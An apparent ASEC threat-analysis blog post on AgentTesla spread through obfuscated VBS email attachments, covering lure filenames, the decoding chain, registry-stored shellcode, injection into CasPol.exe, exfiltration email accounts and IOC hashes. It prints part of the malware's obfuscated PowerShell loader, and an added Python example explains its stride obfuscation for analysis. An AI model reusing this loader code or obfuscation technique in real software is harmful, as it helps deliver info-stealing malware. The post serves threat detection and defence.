AgentTesla Being Distributed via VBS – ASEC BLOG

The ASEC analysis team has recently identified that AgentTesla is being distributed through a malicious VBS file. The script contains several layers of code that have each been obfuscated multiple times. AgentTesla was also found being distributed last May through a Windows Help file (*.chm), so its distribution method appears to be changing continuously.

The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified.

Distributed email

The compressed email attachment contains the VBS file, and the filenames commonly pose as invoices and proposals. The confirmed filenames are as follows:

Date   Filename
10/05  doc_10049500220529464169750.pdf.vbs
10/07  doc_5246701207754814333490.vbs
10/12  № 106 – Supply of Flex.vbs
       protected copy of the commercial invoice.vbs
10/12  LJUR900225565_pdf.vbs
10/13  770140578183.CL.NoticeOfArrival.vbs
10/15  Urgent RFQ No.6554342.vbs
10/17  JKTR002014953_5101075053_ppwk.vbs
10/17  Order List(Draft) 9419-PDF.vbs
10/18  BESOLO.vbs
10/21  BEST SOLU.vbs
Confirmed filenames

The confirmed VBS files contain a large number of comment lines (annotations) and dummy code.

Confirmed VBS file

Aside from the many comments and the dummy code, there is code at the bottom of the file that reads the strings of the currently running VBS file itself, excluding every 2 characters.

Code inside the VBS

When this code is executed, the strings hidden in the comments are decoded and the resulting new script code is executed. The decoded code includes an obfuscated shellcode and an additional PowerShell command.

Decoded VBS code

When the above script code is executed, the value of ‘Ch8’, an obfuscated shellcode, is saved to HKCUSoftwareBasilicae17Vegetates.

Value saved to the registry

Afterward, the value of the ‘O9’ variable is executed through PowerShell. The ‘O9’ variable holds a PowerShell command, and that command is obfuscated as shown below.

powershell.exe  "$Quegh = """DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes`$LivHPerSWir)Con;Fat Ret Hjl Amp Aft`$IntBLavySaltfaseBinsEno Che=Sax CenNDvdeDoswCyp-VovOShab <omitted> Ind5Nin3Ree#Apo;""";;
Function Tammy159 { param([String]$HS);  For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Statice = $Statice + $HS.Substring($i, 1);   }    $Statice;}
$Ambulancetjeneste1820 = Tammy159 'UnsIPujEFolXInt ';
$Ambulancetjeneste1821= Tammy159 $Quegh;
& ($Ambulancetjeneste1820) $Ambulancetjeneste1821;;
PowerShell command that is executed

The PowerShell code decodes the obfuscated value stored in the ‘$Quegh’ variable by skipping 3 characters and keeping the 4th, starting at index 3 (e.g. UnsIPujEFolXInt -> IEX).
The decoded command is itself obfuscated again, and the code that is ultimately executed is as follows.
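The stride trick above can be reproduced statically, so an analyst can recover the command without running it. The following Python is an added example, not code from the ASEC post or from the malware: it mirrors the Tammy159 loop, and also brute-forces the (start, step) pair for a sample whose loop constants differ, which goes beyond the single case on the page. The IEX token and the visible prefix of $Quegh are quoted from the post; the marker list and the guess_stride helper are assumptions of this example.

```python
"""Stride deobfuscation used by the AgentTesla VBS -> PowerShell loader.

The loader buries the real script in filler characters and recovers it by
keeping one character every few positions; the PowerShell stage (Tammy159)
starts at index 3 and keeps one character out of every four. IEX_TOKEN and
QUEGH_PREFIX are quoted from the ASEC post; _MARKERS and guess_stride() are
constructed for this example.
"""
from typing import Tuple

def stride_decode(blob: str, start: int = 3, step: int = 4) -> str:
    """Mirror of Tammy159: keep blob[i] for i = start, start+step, ... while i < len-1.
    The '-lt Length-1' bound is kept, so a character at the very last index is
    dropped; the loader's tokens carry a trailing space to absorb that."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))

# Substrings a decoded PowerShell stage is likely to contain (used for scoring only).
_MARKERS = ("function", "param", "string", "new-ob", "iex", "invoke", "byte")

def guess_stride(blob: str, max_step: int = 8) -> Tuple[int, int]:
    """Brute-force (start, step) for a sample whose loop constants differ from the
    post: return the pair whose decoding contains the most markers (ties: smaller step)."""
    best, best_key = (0, 1), (-1, 0, 0)
    for step in range(2, max_step + 1):
        for start in range(step):
            text = stride_decode(blob, start, step).lower()
            hits = sum(text.count(m) for m in _MARKERS)
            key = (hits, -step, -start)
            if key > best_key:
                best, best_key = (start, step), key
    return best

# Quoted from the post up to its <omitted> marker; the PowerShell escape `$ is
# written as the plain $ that the double-quoted string actually holds.
IEX_TOKEN = "UnsIPujEFolXInt "
QUEGH_PREFIX = (
    "DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude "
    "UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes$LivHPerSWir)Con;"
    "Fat Ret Hjl Amp Aft$IntBLavySaltfaseBinsEno Che=Sax CenNDvdeDoswCyp-VovOShab "
)

if __name__ == "__main__":
    print(stride_decode(IEX_TOKEN))     # IEX
    print(guess_stride(QUEGH_PREFIX))   # (3, 4)
    print(stride_decode(QUEGH_PREFIX))  # Function HTB {    param([String]$HS);    $Bytes = New-Ob
```

Decoding the visible prefix shows the second stage opening with yet another stride-decoder function and a `$Bytes = New-Ob...` assignment, which matches the post's note that the decoded command is obfuscated once more.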

The PowerShell command that is executed ultimately

The obfuscated shellcode saved earlier in HKCUSoftwareBasilicae17Vegetates is base64-decoded and executed. The shellcode injects the AgentTesla malware into CasPol.exe, a legitimate process. AgentTesla is an info-stealer that collects information from the user's PC, compresses it into CO_[username]/[PC name].zip and exfiltrates it via email.

The email account information used for exfiltration is as follows.

  • From : hasan@edp-bkv.com
  • To : kingpentecost22@gmail.com
  • pw : Fb56****65fr
Leaked information

AgentTesla is malware that regularly appears in the weekly statistics, and its distribution method keeps changing. Caution is also advised because, depending on the shellcode, a variety of malware other than AgentTesla can be executed by this loader.

[File Detection]
Dropper/VBS.Generic
Downloader/VBS.Powershell
Trojan/VBS.Agent
Trojan/VBS.Obfuscated

[IOC]
7fe2ed92d9306c8f0843cbb4a38f88e0
b06081daa9bc002cd750efb65e1e932e
eccef74de61f20a212ecbb4ead636f73
ea202427fbe14d9a6d808b9ee911f68c


Source: https://asec.ahnlab.com/en/40890/